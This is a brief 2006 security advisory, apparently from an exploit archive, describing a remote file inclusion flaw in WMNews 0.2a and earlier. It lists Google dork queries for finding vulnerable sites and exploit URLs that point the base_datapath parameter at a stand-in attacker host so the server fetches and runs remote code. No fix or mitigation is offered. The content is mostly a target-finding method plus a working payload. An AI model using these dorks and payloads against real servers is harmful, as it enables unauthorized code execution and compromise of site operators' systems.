WMNews <= 0.2a (base_datapath) Remote Inclusion Vulnerability

2006-07-27 00:00:00

Advisory: WMNews Remote File Include Vulnerability
Release Date: 2006/07/26
Author: uNfz
Critical Level: High
Contact: [email protected]
Vendor: Warta Mikael

--------------------
--------------------

Searching / Dork:

allinurl: *.php?Artid=*
allinurl: *.php?ArtCat=*
allinurl: wmprint.php
allinurl: wmview.php

--------------------

exploration:

/index.php?config=1&base_datapath=http://[evilhost]
/[dir]/index.php?config=1&base_datapath=http://[evilhost]

--------------------

uNfz
irc.efnet.org

#

Fixes

No fixes

In order to submit a new fix you need to be registered.